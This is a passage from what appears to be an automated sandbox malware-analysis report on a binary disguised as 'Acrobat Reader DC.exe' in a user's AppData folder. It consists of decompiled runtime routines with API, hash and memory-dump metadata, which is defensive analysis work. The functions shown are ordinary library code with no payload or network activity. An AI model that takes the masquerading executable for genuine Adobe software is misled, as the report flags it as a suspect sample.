                                  					_t16 = (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3);
                                  					_t41 = _t16;
                                  				}
                                  				 *(_t35 + 8) = _t16;
                                  				_push( ~(0 | _t41 > 0x00000000) | _t16 * 0x00000002); // executed
                                  				_t18 = E004115D7(_t34, _t35, _t41); // executed
                                  				 *_t35 = _t18;
                                  				E00410E60(_t18, _t34,  *((intOrPtr*)(_t35 + 4)) +  *((intOrPtr*)(_t35 + 4)) + 2);
                                  				_push(4); // executed
                                  				_t20 = E004115D7(_t34, _t35, _t41); // executed
                                  				if(_t20 == 0) {
                                  					_t20 = 0;
                                  				} else {
                                  					 *_t20 = 1;
                                  				}
                                  				 *((intOrPtr*)(_t35 + 0xc)) = _t20;
                                  				return _t35;
                                  			}












                                  APIs
                                  • _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00401B57
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                  • String ID: @EXITCODE
                                  • API String ID: 2734553683-3436989551
                                  • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                  • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                  • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                  • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00410100(void* __eax, void* __ecx, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v24;
                                  				void* __edi;
                                  				void* _t9;
                                  				void* _t11;
                                  
                                  				_t9 = E0040F760(__ecx,  &_v24, __eflags, __eax); // executed
                                  				if(_t9 == 0) {
                                  					_t11 = E004528BD(__eflags,  &_v24, L">>>AUTOIT NO CMDEXECUTE<<<",  &_v8,  &_v12); // executed
                                  					__eflags = _t11;
                                  					if(_t11 == 0) {
                                  						E00413748(_v8);
                                  						E00431E58( &_v24);
                                  						return 1;
                                  					} else {
                                  						E00431E58( &_v24); // executed
                                  						goto L1;
                                  					}
                                  				} else {
                                  					L1:
                                  					return 0;
                                  				}
                                  			}










                                  Strings
                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 00410107
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 0-1618683850
                                  • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                  • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                  • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                  • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043213D(void* __edx, void* __eflags, intOrPtr _a4) {
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t5;
                                  				intOrPtr _t6;
                                  				intOrPtr _t7;
                                  				intOrPtr _t11;
                                  				void* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr _t15;
                                  
                                  				_t12 = __edx;
                                  				_t15 = _a4;
                                  				_t5 = E004135BB(__edx, _t13, _t15, 0x20000); // executed
                                  				_t14 = _t5;
                                  				 *((intOrPtr*)(_t15 + 0x438)) = _t14;
                                  				_t6 = E004135BB(__edx, _t14, _t15, 0x10000); // executed
                                  				_t11 = _t6;
                                  				 *((intOrPtr*)(_t15 + 0x45c)) = _t11;
                                  				_t7 = E004135BB(_t12, _t14, _t15, 0x10000); // executed
                                  				 *((intOrPtr*)(_t15 + 0x458)) = _t7;
                                  				if(_t14 == 0 || _t11 == 0 || _t7 == 0) {
                                  					E004320F8(_t15);
                                  					return 5;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}













                                  APIs
                                  • _malloc.LIBCMT ref: 0043214B
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _malloc.LIBCMT ref: 0043215D
                                  • _malloc.LIBCMT ref: 0043216F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc$AllocateHeap
                                  • String ID:
                                  • API String ID: 680241177-0
                                  • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                  • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                  • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                  • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D6B0(void* __fp0, char _a4, short* _a12) {
                                  				int _v8;
                                  				intOrPtr _v12;
                                  				char _v20;
                                  				int _v24;
                                  				intOrPtr _v28;
                                  				char _v36;
                                  				int _v40;
                                  				char _v48;
                                  				struct HINSTANCE__* _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t21;
                                  				intOrPtr _t22;
                                  				void* _t24;
                                  				intOrPtr _t27;
                                  				struct HINSTANCE__* _t32;
                                  				intOrPtr _t42;
                                  				intOrPtr _t48;
                                  				void* _t63;
                                  
                                  				_t63 = __fp0;
                                  				_t21 =  *0x4a9604; // 0xa72e98
                                  				if( *((intOrPtr*)(_t21 + 0x1d)) == 0) {
                                  					_t22 = 1;
                                  				} else {
                                  					_t41 = _a4;
                                  					 *0x497520 = _a4;
                                  					 *0x4974f4 = 0;
                                  					 *0x4974f0 = 0;
                                  					_v36 = 0;
                                  					_v28 = 1;
                                  					_v24 = 0;
                                  					_v20 = 0;
                                  					_v12 = 1;
                                  					_v8 = 0;
                                  					E00408F40(1,  &_v36);
                                  					_t43 =  &_v20;
                                  					_v28 = 6;
                                  					_v36 =  &_v20;
                                  					_v48 = 0;
                                  					_v40 = 0;
                                  					 *0x49751c = 0;
                                  					_t24 = E0040EBB0( &_v48);
                                  					_t61 = _t24;
                                  					if(_t24 != 0) {
                                  						 *0x49751c =  *((intOrPtr*)(E0040EC00( &_v48, _t61)))();
                                  					}
                                  					E00411951(0, _t43, 1, 0x4370c3);
                                  					E004119B0(1);
                                  					_t27 =  *0x4a9608; // 0xa72f00
                                  					E0040F4E0(_t41, _t27);
                                  					E0040D590(_a12, _t41, _t61, _t63);
                                  					_t42 =  *0x4a9608; // 0xa72f00
                                  					SystemParametersInfoW(0x2001, 0,  *(_t42 + 4), 2);
                                  					_t32 = _v52;
                                  					_t48 =  *0x4974f4;
                                  					if(_t32 != 0) {
                                  						FreeLibrary(_t32);
                                  					}
                                  					E00408F40(_t48,  &_v20);
                                  					E00408F40(_t48,  &_v36);
                                  					_t22 = _t48;
                                  				}
                                  				return _t22;
                                  			}
























                                  APIs
                                  • SystemParametersInfoW.USER32 ref: 0040D779
                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FreeInfoLibraryParametersSystem
                                  • String ID:
                                  • API String ID: 3403648963-0
                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00414C76(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _t19;
                                  				intOrPtr _t22;
                                  				void* _t33;
                                  
                                  				_push(0xc);
                                  				_push(0x48d048);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                                  				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                                  					L6:
                                  					_t19 = 0;
                                  				} else {
                                  					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                                  						E00415471( *((intOrPtr*)(_t33 + 0x18)));
                                  						 *((intOrPtr*)(_t33 - 4)) = 0;
                                  						_t22 = E00414ABA( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                                  						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                                  						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                                  						E00414CFA();
                                  						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                                  					} else {
                                  						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                                  						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                                  							E00412F40( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                                  						}
                                  						 *((intOrPtr*)(E00417F77(_t41))) = 0x16;
                                  						E00417F25();
                                  						goto L6;
                                  					}
                                  				}
                                  				return E00416CB5(_t19);
                                  			}






                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __lock_file_memset
                                  • String ID:
                                  • API String ID: 26237723-0
                                  • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                  • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                  • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00414A46(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t20;
                                  				signed int _t22;
                                  				intOrPtr _t32;
                                  				void* _t33;
                                  				intOrPtr _t35;
                                  
                                  				_push(0xc);
                                  				_push(0x48d028);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
                                  				_t32 =  *((intOrPtr*)(_t33 + 8));
                                  				_t35 = _t32;
                                  				_t36 = _t35 != 0;
                                  				if(_t35 != 0) {
                                  					__eflags =  *(_t32 + 0xc) & 0x00000040;
                                  					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
                                  						E00415471(_t32);
                                  						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
                                  						_t20 = E004149D9(__ebx, __edx, _t32); // executed
                                  						 *(_t33 - 0x1c) = _t20;
                                  						 *(_t33 - 4) = 0xfffffffe;
                                  						E00414AB2(_t32);
                                  					} else {
                                  						_t9 = _t32 + 0xc;
                                  						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
                                  						__eflags =  *_t9;
                                  					}
                                  					_t22 =  *(_t33 - 0x1c);
                                  				} else {
                                  					 *((intOrPtr*)(E00417F77(_t36))) = 0x16;
                                  					_t22 = E00417F25() | 0xffffffff;
                                  				}
                                  				return E00416CB5(_t22);
                                  			}








                                  APIs
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  • __lock_file.LIBCMT ref: 00414A8D
                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                  • String ID:
                                  • API String ID: 2800547568-0
                                  • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                  • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                  • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00414FE2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t15;
                                  				signed int _t17;
                                  				void* _t27;
                                  				intOrPtr _t29;
                                  
                                  				_push(0xc);
                                  				_push(0x48d068);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				_t29 =  *((intOrPtr*)(_t27 + 8));
                                  				_t30 = _t29 != 0;
                                  				if(_t29 != 0) {
                                  					E00415471( *((intOrPtr*)(_t27 + 8)));
                                  					_t5 = _t27 - 4;
                                  					 *_t5 =  *(_t27 - 4) & 0x00000000;
                                  					__eflags =  *_t5;
                                  					_t15 = E00414E4E(__edx,  *((intOrPtr*)(_t27 + 8))); // executed
                                  					 *(_t27 - 0x1c) = _t15;
                                  					 *(_t27 - 4) = 0xfffffffe;
                                  					E0041503D();
                                  					_t17 =  *(_t27 - 0x1c);
                                  				} else {
                                  					 *((intOrPtr*)(E00417F77(_t30))) = 0x16;
                                  					_t17 = E00417F25() | 0xffffffff;
                                  				}
                                  				return E00416CB5(_t17);
                                  			}







                                  APIs
                                  • __lock_file.LIBCMT ref: 00415012
                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                  • String ID:
                                  • API String ID: 2999321469-0
                                  • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                  • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00411682(int _a4) {
                                  
                                  				E00411657(_a4);
                                  				ExitProcess(_a4);
                                  			}



                                  0x0041168a
                                  0x00411693

                                  APIs
                                  • ___crtCorExitProcess.LIBCMT ref: 0041168A
                                    • Part of subcall function 00411657: GetModuleHandleW.KERNEL32(mscoree.dll,?,0041168F,004115F6,?,0041823B,000000FF,0000001E,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D), ref: 00411661
                                    • Part of subcall function 00411657: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411671
                                  • ExitProcess.KERNEL32 ref: 00411693
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                  • String ID:
                                  • API String ID: 2427264223-0
                                  • Opcode ID: 176e26db055b62aeaf9cf92000a80230bc536f1d50f5b4dae20e080cb65f91b1
                                  • Instruction ID: f47d9122093ed6489770cc06aed7b78ba16bb349dce56bb799ac8566cdeb1789
                                  • Opcode Fuzzy Hash: 176e26db055b62aeaf9cf92000a80230bc536f1d50f5b4dae20e080cb65f91b1
                                  • Instruction Fuzzy Hash: 56B09B310001487BCB052F16DD0D84D3F15DB413907544029F91905031DF779D919688
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E00402780(intOrPtr* __eax, void* __ecx, void* __edi) {
                                  				void* __esi;
                                  				intOrPtr _t40;
                                  				signed int _t41;
                                  				intOrPtr _t44;
                                  				intOrPtr* _t50;
                                  				signed int _t51;
                                  				signed short _t52;
                                  				signed int _t53;
                                  				intOrPtr* _t55;
                                  				signed int _t56;
                                  				intOrPtr* _t57;
                                  				intOrPtr* _t58;
                                  				intOrPtr* _t59;
                                  				void* _t77;
                                  				intOrPtr _t78;
                                  				signed int _t79;
                                  				intOrPtr* _t80;
                                  				void* _t83;
                                  
                                  				_t77 = __edi;
                                  				_t57 = __eax;
                                  				_t1 = _t77 + 0xc; // 0x43
                                  				_t40 =  *_t1;
                                  				_push(_t78);
                                  				_t86 =  *((intOrPtr*)(__edi + 8)) - _t40;
                                  				if( *((intOrPtr*)(__edi + 8)) == _t40) {
                                  					_t41 = _t40 + _t40;
                                  					 *(__edi + 0xc) = _t41;
                                  					__eflags = _t41 - 4;
                                  					if(__eflags < 0) {
                                  						_t79 = 4;
                                  					} else {
                                  						_t79 = _t41;
                                  					}
                                  					 *(_t77 + 0xc) = _t79;
                                  					_push( ~(0 | __eflags > 0x00000000) | _t79 * 0x00000004);
                                  					_t44 = E004115D7(_t77, _t79, __eflags);
                                  					_t33 = _t77 + 4; // 0x444ad7
                                  					_t78 = _t44;
                                  					_t34 = _t77 + 8; // 0x530041
                                  					E00410E60(_t78,  *_t33,  *_t34 +  *_t34 +  *_t34 +  *_t34);
                                  					_t35 = _t77 + 4; // 0x444ad7
                                  					_push( *_t35);
                                  					E004111DC();
                                  					_t83 = _t83 + 0x14;
                                  					 *((intOrPtr*)(_t77 + 4)) = _t78;
                                  				}
                                  				_push(0xc); // executed
                                  				_t50 = E004115D7(_t77, _t78, _t86); // executed
                                  				if(_t50 == 0) {
                                  					_t80 = 0;
                                  					goto L6;
                                  				} else {
                                  					_t80 = _t50;
                                  					_t52 =  *((intOrPtr*)(_t57 + 8));
                                  					 *(_t80 + 8) = _t52;
                                  					_t53 = _t52 & 0x0000ffff;
                                  					 *((short*)(_t80 + 0xa)) =  *((intOrPtr*)(_t57 + 0xa));
                                  					if(_t53 <= 0x3f) {
                                  						__eflags = _t53 - 0x30;
                                  						if(__eflags < 0) {
                                  							goto L3;
                                  						} else {
                                  							_push(0x10); // executed
                                  							_t55 = E004115D7(_t77, _t80, __eflags); // executed
                                  							__eflags = _t55;
                                  							if(_t55 == 0) {
                                  								_t55 = 0;
                                  							} else {
                                  								_t58 =  *_t57;
                                  								 *_t55 =  *_t58;
                                  								 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t58 + 4));
                                  								 *((intOrPtr*)(_t55 + 8)) =  *((intOrPtr*)(_t58 + 8));
                                  								_t59 =  *((intOrPtr*)(_t58 + 0xc));
                                  								 *((intOrPtr*)(_t55 + 0xc)) = _t59;
                                  								 *_t59 =  *_t59 + 1;
                                  								__eflags =  *_t59;
                                  							}
                                  							 *_t80 = _t55;
                                  							_t19 = _t77 + 8; // 0x530041
                                  							_t56 =  *_t19;
                                  							_t20 = _t77 + 4; // 0x444ad7
                                  							 *((intOrPtr*)( *_t20 + _t56 * 4)) = _t80;
                                  							_t23 = _t77 + 8;
                                  							 *_t23 =  *(_t77 + 8) + 1;
                                  							__eflags =  *_t23;
                                  							return _t56;
                                  						}
                                  					} else {
                                  						L3:
                                  						if(_t53 == 0x10) {
                                  							 *_t80 =  *_t57;
                                  							 *((intOrPtr*)(_t80 + 4)) =  *((intOrPtr*)(_t57 + 4));
                                  						} else {
                                  							if(_t53 == 0x20) {
                                  								 *_t80 =  *_t57;
                                  							} else {
                                  								 *_t80 =  *_t57;
                                  							}
                                  						}
                                  						L6:
                                  						_t7 = _t77 + 8; // 0x530041
                                  						_t51 =  *_t7;
                                  						_t8 = _t77 + 4; // 0x444ad7
                                  						 *((intOrPtr*)( *_t8 + _t51 * 4)) = _t80;
                                  						 *(_t77 + 8) =  *(_t77 + 8) + 1;
                                  						return _t51;
                                  					}
                                  				}
                                  			}





















                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
